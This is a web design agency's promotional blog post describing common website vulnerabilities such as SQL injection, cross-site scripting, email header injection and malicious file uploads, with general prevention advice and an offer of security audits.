Here at Wubbleyou, we like to keep our customers up to date with the latest news from Wubbleyou HQ, new technologies available and also articles on current IT related stories. If it’s happening on the world wide web, we’re probably blogging about it!
One of the most common attack vectors with the most devastating results is SQL injection. SQL injection occurs when a malicious user injects code into your website to modify, steal or even erase information stored in your database. SQL injection is easily avoidable but tends to be overlooked or untested, especially in older websites.
SQL Injection Prevention
There are several proven methods employed to prevent this which we will always employ, but the most basic rule is to trust no data received from any user and properly validate all input.
According to Security firm Semantic, XSS accounted for 80% in website vulnerabilities in 2007. XSS is a method employed by malicious users whereby they inject code into your website to complete a range of actions from stealing your clients log in details, to installing malicious software on your user’s computers. Websites that have been exploited by this can be blacklisted and marked by search engines as unsafe; making it paramount this issue is checked for.
Cross Site Scripting (XSS) Prevention
To prevent this it is also necessary to validate all user input and remove any malicious attempts to exploit a vulnerability. Again all websites created by Wubbleyou are screened and methods are put into place to prevent this.
This vulnerability is a slightly less known one and sometimes overlooked. This occurs when a malicious user attempted to inject data into your website’s email contact form to force it to email many users instead of you. This is exploited to manipulate your website to send large amounts of spam emails. If this is occurring your email address and server may be blacklisted as a known culprit for sending spam.
Email Form Header Injection Prevention
Again the way to prevent this is to screen user input and remove all malicious attempts at exploiting this.
This can occur anywhere on your website where you allow users to upload files. If they are successful in uploading a malicious file they will be able to gain full control of your website and most likely full access to your database.
Malicious File Upload and Execution Prevention
It is important to validate the firstly the file name and then the true nature of the file before storing it on your website. For example it is fairly easy to disguise a malicious payload as an image file/word document, upload it to your website and execute it later.
It is important that any information that you want to show one group of users but hide from another is properly secured. For example it must be ensured that a user is properly validated and cannot spoof their way into a protected area or circumvent the security features completely.
Sometimes a lot of trust is placed on the users in your system/company that you employee to run your website and therefore have escalated privileges. It is paramount that each user has their own log in details and that all actions they cause are logged, making every user accountable for what they have done, especially if it was malicious.
All errors triggered by a user causing an action accidently or maliciously should be properly handled so as not to give away any information regarding the inner workings of your system.
At Wubbleyou we employ a strict set of security policies whilst creating every website to ensure that nothing is left untied which will lead to any of the above. If you already have a website which you suspect could be susceptible to one of the above we can also audit and patch an existing website. If you aren’t sure, get in touch and we can even complete a basic assessment free of charge!
If you store user data is very important that sensitive data is secured (such as personal details and credit card numbers). If you are storing your information in plain text and your system is compromised it can be very embarrassing. For this reason we also provide a service whereby we ensure all the important information in your system is heavily encrypted, taking longer than the age of the universe to crack!
Please feel free to contact us if you have any concerns what so ever.
Get your website checked and tested. Thinking of re-designing? It's simple to get in touch
There are a few common mistakes made when designing a UI, here are 7 that you need to avoid at all cost.
26th January 2017
As holidays come and go, winter is pretty much here and Christmas is around the corner! If your thinking of a temporary redesign, have a look at this first!
1st November 2016